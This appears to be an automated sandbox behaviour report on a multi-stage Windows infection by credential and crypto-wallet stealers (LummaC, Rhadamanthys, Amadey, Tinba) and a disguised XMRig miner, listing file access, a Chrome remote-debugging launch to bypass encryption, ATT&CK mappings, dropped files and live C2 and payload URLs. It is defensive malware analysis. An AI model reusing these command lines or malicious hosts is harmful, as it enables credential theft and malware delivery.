Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Directory queried: C:\Users\user\Documents\GAOBCVIQIJ	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Directory queried: C:\Users\user\Documents\GAOBCVIQIJ	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Directory queried: C:\Users\user\Documents\JDDHMPCDUJ	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Directory queried: C:\Users\user\Documents\JDDHMPCDUJ	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Directory queried: C:\Users\user\Documents\PIVFAGEAAV	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Directory queried: C:\Users\user\Documents\PIVFAGEAAV	Jump to behavior

Source: Yara match	File source: 0000000E.00000003.2064174110.0000000000E6E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.2065590951.0000000000E7D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.2064564073.0000000000E6E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.2064724711.0000000000E7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 3a1a782de7.exe PID: 6704, type: MEMORYSTR

Remote Access Functionality

Attempt to bypass Chrome Application-Bound Encryption

Source: C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe

Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"

Yara detected Cryptbot

Source: Yara match

File source: dump.pcap, type: PCAP

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: 3a1a782de7.exe PID: 6704, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Yara detected RHADAMANTHYS Stealer

Source: Yara match	File source: 00000008.00000003.1721363531.0000000000CB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1732609281.0000000003200000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.1721407127.0000000004E30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.1716803136.0000000002AF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	3 Windows Management Instrumentation	1 Scripting	1 DLL Side-Loading	11 Deobfuscate/Decode Files or Information	2 OS Credential Dumping	1 System Time Discovery	Remote Services	11 Archive Collected Data	12 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	1 DLL Side-Loading	512 Process Injection	41 Obfuscated Files or Information	21 Input Capture	13 File and Directory Discovery	Remote Desktop Protocol	41 Data from Local System	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	13 Command and Scripting Interpreter	11 Scheduled Task/Job	11 Scheduled Task/Job	121 Software Packing	Security Account Manager	365 System Information Discovery	SMB/Windows Admin Shares	1 Screen Capture	1 Remote Access Software	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	11 Scheduled Task/Job	Login Hook	Login Hook	1 DLL Side-Loading	NTDS	11101 Security Software Discovery	Distributed Component Object Model	21 Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	2 PowerShell	Network Logon Script	Network Logon Script	11 Masquerading	LSA Secrets	12 Process Discovery	SSH	2 Clipboard Data	114 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	371 Virtualization/Sandbox Evasion	Cached Domain Credentials	371 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	512 Process Injection	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	11 Remote System Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	HTML Smuggling	/etc/passwd and /etc/shadow	1 System Network Configuration Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
file.exe	100%	Avira	TR/Crypt.TPM.Gen
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	100%	Avira	TR/Crypt.TPM.Gen
C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe	100%	Avira	TR/Crypt.TPM.Gen
C:\Users\user\AppData\Local\Temp\main\extracted\in.exe	100%	Avira	HEUR/AGEN.1352802
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\random[2].exe	100%	Avira	TR/Crypt.TPM.Gen
C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	100%	Avira	HEUR/AGEN.1352802
C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\1016894001\4ec75545d6.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\random[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\main\extracted\in.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\random[2].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\random[2].exe	39%	ReversingLabs	Win32.Infostealer.Tinba
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\random[1].exe	71%	ReversingLabs	Win32.Trojan.LummaStealer
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\random[2].exe	88%	ReversingLabs	Win32.Trojan.Amadey
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\random[1].exe	74%	ReversingLabs	Win32.Trojan.LummaStealer
C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	71%	ReversingLabs	Win32.Trojan.LummaStealer
C:\Users\user\AppData\Local\Temp\1016896001\44cc35716d.exe	74%	ReversingLabs	Win32.Trojan.LummaStealer
C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe	39%	ReversingLabs	Win32.Infostealer.Tinba
C:\Users\user\AppData\Local\Temp\1016898001\c46817b905.exe	88%	ReversingLabs	Win32.Trojan.Amadey
C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	50%	ReversingLabs	Win32.Infostealer.Tinba
C:\Users\user\AppData\Local\Temp\main\7z.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\main\7z.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\main\extracted\in.exe	67%	ReversingLabs	Win64.Trojan.Nekark
C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	67%	ReversingLabs	Win64.Trojan.Nekark

Source	Detection	Scanner	Label
http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322?argument=JSFdsYpNAyKuuMJE1734525529	0%	Avira URL Cloud	safe
https://pancakedipyps.click/apiW#	0%	Avira URL Cloud	safe
https://pancakedipyps.click:443/api	0%	Avira URL Cloud	safe
http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322	0%	Avira URL Cloud	safe
https://grannyejh.lat/apis	100%	Avira URL Cloud	malware
https://grannyejh.lat/apiY	100%	Avira URL Cloud	malware
https://grannyejh.lat/ic	100%	Avira URL Cloud	malware
https://grannyejh.lat:443/api	100%	Avira URL Cloud	malware
https://grannyejh.lat/apit	100%	Avira URL Cloud	malware
https://grannyejh.lat/pi.V	100%	Avira URL Cloud	malware
https://pancakedipyps.click/2	0%	Avira URL Cloud	safe
https://pancakedipyps.click/pi.#	0%	Avira URL Cloud	safe
http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnY322	0%	Avira URL Cloud	safe
https://grannyejh.lat/.	100%	Avira URL Cloud	malware
https://pancakedipyps.click/3#	0%	Avira URL Cloud	safe
https://pancakedipyps.click:443/api6	0%	Avira URL Cloud	safe
https://grannyejh.lat/	100%	Avira URL Cloud	malware
https://grannyejh.lat/944	100%	Avira URL Cloud	malware
https://grannyejh.lat/apiXV	100%	Avira URL Cloud	malware
https://pancakedipyps.click/apiW	0%	Avira URL Cloud	safe
https://grannyejh.lat/apigs6#Y	100%	Avira URL Cloud	malware
https://grannyejh.lat/H	100%	Avira URL Cloud	malware
https://grannyejh.lat/C	100%	Avira URL Cloud	malware
https://grannyejh.lat/api	100%	Avira URL Cloud	malware
https://grannyejh.lat/M	100%	Avira URL Cloud	malware
https://grannyejh.lat/api.V	100%	Avira URL Cloud	malware
https://grannyejh.lat/api5	100%	Avira URL Cloud	malware
https://grannyejh.lat:443/apin	100%	Avira URL Cloud	malware
http://twentytk20pn.top/v1/upload.php	0%	Avira URL Cloud	safe
https://grannyejh.lat/apit)0	100%	Avira URL Cloud	malware
http://31.41.244.11/files/dodo/random.exe	100%	Avira URL Cloud	phishing
https://grannyejh.lat/hne	100%	Avira URL Cloud	malware
https://grannyejh.lat/_	100%	Avira URL Cloud	malware
https://grannyejh.lat/apiore%#J	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
pancakedipyps.click	104.21.23.76	true	false	high
grannyejh.lat	104.21.64.80	true	true	unknown
www.google.com	142.250.181.132	true	false	high
home.twentytk20pn.top	185.185.71.170	true	false	high
twentytk20pn.top	185.185.71.170	true	false	high
httpbin.org	98.85.100.80	true	false	high
sweepyribs.lat	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
pancakedipyps.click	false		high
http://31.41.244.11/files/unique3/random.exe	false		high
necklacebudi.lat	false		high
http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322	true	Avira URL Cloud: safe	unknown
http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322?argument=JSFdsYpNAyKuuMJE1734525529	true	Avira URL Cloud: safe	unknown
aspecteirs.lat	false		high
http://185.215.113.43/Zu7JuNko/index.php	false		high
sustainskelet.lat	false		high
crosshuaht.lat	false		high
rapeflowwj.lat	false		high
https://pancakedipyps.click/api	false		high
energyaffai.lat	false		high
http://31.41.244.11/files/dodo/random.exe	false	Avira URL Cloud: phishing	unknown
https://httpbin.org/ip	false		high
https://grannyejh.lat/api	true	Avira URL Cloud: malware	unknown
http://twentytk20pn.top/v1/upload.php	true	Avira URL Cloud: safe	unknown
grannyejh.lat	false		high
discokeyus.lat	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://html4/loose.dtd	bc8eaffed4.exe, 00000014.00000003.1967470791.0000000006FEF000.00000004.00001000.00020000.00000000.sdmp	false		high
https://duckduckgo.com/chrome_newtab	3a1a782de7.exe, 0000000E.00000003.1936742720.00000000035D8000.00000004.00000800.00020000.00000000.sdmp, 3a1a782de7.exe, 0000000E.00000003.1936660966.00000000035DB000.00000004.00000800.00020000.00000000.sdmp, 3a1a782de7.exe, 0000000E.00000003.1936848702.00000000035D8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	3a1a782de7.exe, 0000000E.00000003.1936742720.00000000035D8000.00000004.00000800.00020000.00000000.sdmp, 3a1a782de7.exe, 0000000E.00000003.1936660966.00000000035DB000.00000004.00000800.00020000.00000000.sdmp, 3a1a782de7.exe, 0000000E.00000003.1936848702.00000000035D8000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#	3a1a782de7.exe, 0000000C.00000002.1807838541.0000000000945000.00000004.00000020.00020000.00000000.sdmp, 44cc35716d.exe, 0000000F.00000002.1868427762.000000000109B000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0	3a1a782de7.exe, 0000000C.00000002.1807838541.0000000000945000.00000004.00000020.00020000.00000000.sdmp, 44cc35716d.exe, 0000000F.00000002.1868427762.000000000109B000.00000004.00000020.00020000.00000000.sdmp	false		high
http://ocsp.sectigo.com0	3a1a782de7.exe, 0000000C.00000002.1807838541.0000000000945000.00000004.00000020.00020000.00000000.sdmp, 44cc35716d.exe, 0000000F.00000002.1868427762.000000000109B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://grannyejh.lat/apiY	3a1a782de7.exe, 0000000E.00000003.2097831342.0000000000ED9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	3a1a782de7.exe, 0000000E.00000003.1936742720.00000000035D8000.00000004.00000800.00020000.00000000.sdmp, 3a1a782de7.exe, 0000000E.00000003.1936660966.00000000035DB000.00000004.00000800.00020000.00000000.sdmp, 3a1a782de7.exe, 0000000E.00000003.1936848702.00000000035D8000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#	3a1a782de7.exe, 0000000C.00000002.1807838541.0000000000945000.00000004.00000020.00020000.00000000.sdmp, 44cc35716d.exe, 0000000F.00000002.1868427762.000000000109B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqX1CqX4pbW1pbWfpbZ7ReNxR3UIG8zInwYIFIVs9eYi	3a1a782de7.exe, 0000000E.00000003.2033029290.00000000035A8000.00000004.00000800.00020000.00000000.sdmp	false		high
http://.css	bc8eaffed4.exe, 00000014.00000003.1967470791.0000000006FEF000.00000004.00001000.00020000.00000000.sdmp	false		high
https://pancakedipyps.click/	44cc35716d.exe, 00000011.00000003.1946748605.0000000000D5A000.00000004.00000020.00020000.00000000.sdmp, 44cc35716d.exe, 00000011.00000002.1947390276.0000000000D0C000.00000004.00000020.00020000.00000000.sdmp, 44cc35716d.exe, 00000011.00000002.1947546587.0000000000D5A000.00000004.00000020.00020000.00000000.sdmp, 44cc35716d.exe, 00000011.00000003.1946353858.0000000000D5A000.00000004.00000020.00020000.00000000.sdmp, 44cc35716d.exe, 00000011.00000003.1946353858.0000000000D0C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://pancakedipyps.click:443/api	44cc35716d.exe, 00000011.00000003.1946614877.0000000000D21000.00000004.00000020.00020000.00000000.sdmp, 44cc35716d.exe, 00000011.00000002.1947447706.0000000000D21000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://curl.se/docs/hsts.html	bc8eaffed4.exe, 00000014.00000003.1967470791.0000000006FEF000.00000004.00001000.00020000.00000000.sdmp	false		high
https://grannyejh.lat/apit	3a1a782de7.exe, 0000000E.00000003.1935865202.0000000000E6E000.00000004.00000020.00020000.00000000.sdmp, 3a1a782de7.exe, 0000000E.00000003.1935948006.0000000000E7C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://grannyejh.lat/apis	3a1a782de7.exe, 0000000E.00000003.2029728171.0000000003628000.00000004.00000800.00020000.00000000.sdmp, 3a1a782de7.exe, 0000000E.00000003.2029970890.0000000003629000.00000004.00000800.00020000.00000000.sdmp, 3a1a782de7.exe, 0000000E.00000003.2029340811.0000000003626000.00000004.00000800.00020000.00000000.sdmp, 3a1a782de7.exe, 0000000E.00000003.2029626618.0000000003626000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0	3a1a782de7.exe, 0000000C.00000002.1807838541.0000000000945000.00000004.00000020.00020000.00000000.sdmp, 44cc35716d.exe, 0000000F.00000002.1868427762.000000000109B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://grannyejh.lat/pi.V	3a1a782de7.exe, 0000000E.00000003.2163840954.0000000000ED9000.00000004.00000020.00020000.00000000.sdmp, 3a1a782de7.exe, 0000000E.00000002.2166594545.0000000000ED9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://pancakedipyps.click/apiW#	44cc35716d.exe, 00000011.00000003.1946748605.0000000000D5A000.00000004.00000020.00020000.00000000.sdmp, 44cc35716d.exe, 00000011.00000002.1947546587.0000000000D5A000.00000004.00000020.00020000.00000000.sdmp, 44cc35716d.exe, 00000011.00000003.1946353858.0000000000D5A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://grannyejh.lat:443/api	3a1a782de7.exe, 0000000E.00000002.2166082658.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://grannyejh.lat/ic	3a1a782de7.exe, 0000000E.00000003.2097831342.0000000000ED9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://x1.c.lencr.org/0	3a1a782de7.exe, 0000000E.00000003.2031357954.00000000036AD000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	3a1a782de7.exe, 0000000E.00000003.2031357954.00000000036AD000.00000004.00000800.00020000.00000000.sdmp	false		high
https://grannyejh.lat/apiy	3a1a782de7.exe, 0000000E.00000003.1935865202.0000000000E5C000.00000004.00000020.00020000.00000000.sdmp, 3a1a782de7.exe, 0000000E.00000003.1935709768.0000000000E5A000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	3a1a782de7.exe, 0000000E.00000003.1936742720.00000000035D8000.00000004.00000800.00020000.00000000.sdmp, 3a1a782de7.exe, 0000000E.00000003.1936660966.00000000035DB000.00000004.00000800.00020000.00000000.sdmp, 3a1a782de7.exe, 0000000E.00000003.1936848702.00000000035D8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://pancakedipyps.click/pi.#	44cc35716d.exe, 00000011.00000003.1946748605.0000000000D5A000.00000004.00000020.00020000.00000000.sdmp, 44cc35716d.exe, 00000011.00000002.1947546587.0000000000D5A000.00000004.00000020.00020000.00000000.sdmp, 44cc35716d.exe, 00000011.00000003.1946353858.0000000000D5A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://pancakedipyps.click/2	44cc35716d.exe, 00000011.00000003.1946748605.0000000000D5A000.00000004.00000020.00020000.00000000.sdmp, 44cc35716d.exe, 00000011.00000003.1946353858.0000000000D5A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnY322	bc8eaffed4.exe, 00000014.00000003.1967470791.0000000006FEF000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.mozilla.org/products/firefoxgro.all	3a1a782de7.exe, 0000000E.00000003.2032545720.00000000038C8000.00000004.00000800.00020000.00000000.sdmp	false		high
http://.jpg	bc8eaffed4.exe, 00000014.00000003.1967470791.0000000006FEF000.00000004.00001000.00020000.00000000.sdmp	false		high
http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#	3a1a782de7.exe, 0000000C.00000002.1807838541.0000000000945000.00000004.00000020.00020000.00000000.sdmp, 44cc35716d.exe, 0000000F.00000002.1868427762.000000000109B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://pancakedipyps.click/apiW	44cc35716d.exe, 00000011.00000002.1947390276.0000000000D0C000.00000004.00000020.00020000.00000000.sdmp, 44cc35716d.exe, 00000011.00000003.1946353858.0000000000D0C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://pancakedipyps.click:443/api6	44cc35716d.exe, 00000011.00000003.1946614877.0000000000D21000.00000004.00000020.00020000.00000000.sdmp, 44cc35716d.exe, 00000011.00000002.1947447706.0000000000D21000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://sectigo.com/CPS0	3a1a782de7.exe, 0000000C.00000002.1807838541.0000000000945000.00000004.00000020.00020000.00000000.sdmp, 44cc35716d.exe, 0000000F.00000002.1868427762.000000000109B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://pancakedipyps.click/3#	44cc35716d.exe, 00000011.00000003.1946748605.0000000000D5A000.00000004.00000020.00020000.00000000.sdmp, 44cc35716d.exe, 00000011.00000002.1947546587.0000000000D5A000.00000004.00000020.00020000.00000000.sdmp, 44cc35716d.exe, 00000011.00000003.1946353858.0000000000D5A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	3a1a782de7.exe, 0000000E.00000003.1936742720.00000000035D8000.00000004.00000800.00020000.00000000.sdmp, 3a1a782de7.exe, 0000000E.00000003.1936660966.00000000035DB000.00000004.00000800.00020000.00000000.sdmp, 3a1a782de7.exe, 0000000E.00000003.1936848702.00000000035D8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://curl.se/docs/http-cookies.html	bc8eaffed4.exe, 00000014.00000003.1967470791.0000000006FEF000.00000004.00001000.00020000.00000000.sdmp	false		high
https://grannyejh.lat/apiXV	3a1a782de7.exe, 0000000E.00000003.2118394181.0000000000ED9000.00000004.00000020.00020000.00000000.sdmp, 3a1a782de7.exe, 0000000E.00000003.2163840954.0000000000ED9000.00000004.00000020.00020000.00000000.sdmp, 3a1a782de7.exe, 0000000E.00000002.2166594545.0000000000ED9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://grannyejh.lat/	3a1a782de7.exe, 0000000E.00000003.2118394181.0000000000EC3000.00000004.00000020.00020000.00000000.sdmp, 3a1a782de7.exe, 0000000E.00000003.1935948006.0000000000E7C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://grannyejh.lat/944	3a1a782de7.exe, 0000000E.00000003.1935709768.0000000000E4C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://xmrig.com/wizard%s	Intel_PTT_EK_Recertification.exe, 0000002C.00000003.2714354475.000001E0B2150000.00000004.00000001.00020000.00000000.sdmp	false		high
https://grannyejh.lat/.	3a1a782de7.exe, 0000000E.00000003.1935865202.0000000000E6E000.00000004.00000020.00020000.00000000.sdmp, 3a1a782de7.exe, 0000000E.00000003.1935948006.0000000000E7C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#	3a1a782de7.exe, 0000000C.00000002.1807838541.0000000000945000.00000004.00000020.00020000.00000000.sdmp, 44cc35716d.exe, 0000000F.00000002.1868427762.000000000109B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	3a1a782de7.exe, 0000000E.00000003.1936742720.00000000035D8000.00000004.00000800.00020000.00000000.sdmp, 3a1a782de7.exe, 0000000E.00000003.1936660966.00000000035DB000.00000004.00000800.00020000.00000000.sdmp, 3a1a782de7.exe, 0000000E.00000003.1936848702.00000000035D8000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.rootca1.amazontrust.com/rootca1.crl0	3a1a782de7.exe, 0000000E.00000003.2031357954.00000000036AD000.00000004.00000800.00020000.00000000.sdmp	false		high
https://grannyejh.lat/apigs6#Y	3a1a782de7.exe, 0000000E.00000003.2118394181.0000000000ED9000.00000004.00000020.00020000.00000000.sdmp, 3a1a782de7.exe, 0000000E.00000003.2163840954.0000000000ED9000.00000004.00000020.00020000.00000000.sdmp, 3a1a782de7.exe, 0000000E.00000002.2166594545.0000000000ED9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://ocsp.rootca1.amazontrust.com0:	3a1a782de7.exe, 0000000E.00000003.2031357954.00000000036AD000.00000004.00000800.00020000.00000000.sdmp	false		high
https://grannyejh.lat/H	3a1a782de7.exe, 0000000E.00000003.2086860865.0000000000EC3000.00000004.00000020.00020000.00000000.sdmp, 3a1a782de7.exe, 0000000E.00000003.2064502909.0000000000EC1000.00000004.00000020.00020000.00000000.sdmp, 3a1a782de7.exe, 0000000E.00000003.2064174110.0000000000E6E000.00000004.00000020.00020000.00000000.sdmp, 3a1a782de7.exe, 0000000E.00000003.2097831342.0000000000EC3000.00000004.00000020.00020000.00000000.sdmp, 3a1a782de7.exe, 0000000E.00000002.2166594545.0000000000EC3000.00000004.00000020.00020000.00000000.sdmp, 3a1a782de7.exe, 0000000E.00000003.2118394181.0000000000EC3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://curl.se/docs/alt-svc.html	bc8eaffed4.exe, 00000014.00000003.1967470791.0000000006FEF000.00000004.00001000.00020000.00000000.sdmp	false		high
https://xmrig.com/wizard	Intel_PTT_EK_Recertification.exe, 0000002C.00000003.2714354475.000001E0B2150000.00000004.00000001.00020000.00000000.sdmp	false		high
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696491991400800003.2&ci=1696491991993.	3a1a782de7.exe, 0000000E.00000003.2033029290.00000000035A8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://grannyejh.lat/C	3a1a782de7.exe, 0000000E.00000003.1935865202.0000000000E6E000.00000004.00000020.00020000.00000000.sdmp, 3a1a782de7.exe, 0000000E.00000003.1935948006.0000000000E7C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.ecosia.org/newtab/	3a1a782de7.exe, 0000000E.00000003.1936742720.00000000035D8000.00000004.00000800.00020000.00000000.sdmp, 3a1a782de7.exe, 0000000E.00000003.1936660966.00000000035DB000.00000004.00000800.00020000.00000000.sdmp, 3a1a782de7.exe, 0000000E.00000003.1936848702.00000000035D8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://grannyejh.lat/apit)0	3a1a782de7.exe, 0000000E.00000003.1935709768.0000000000E4C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	3a1a782de7.exe, 0000000E.00000003.2032545720.00000000038C8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	3a1a782de7.exe, 0000000E.00000003.1936742720.00000000035D8000.00000004.00000800.00020000.00000000.sdmp, 3a1a782de7.exe, 0000000E.00000003.1936660966.00000000035DB000.00000004.00000800.00020000.00000000.sdmp, 3a1a782de7.exe, 0000000E.00000003.1936848702.00000000035D8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://httpbin.org/ipbefore	bc8eaffed4.exe, 00000014.00000003.1967470791.0000000006FEF000.00000004.00001000.00020000.00000000.sdmp	false		high
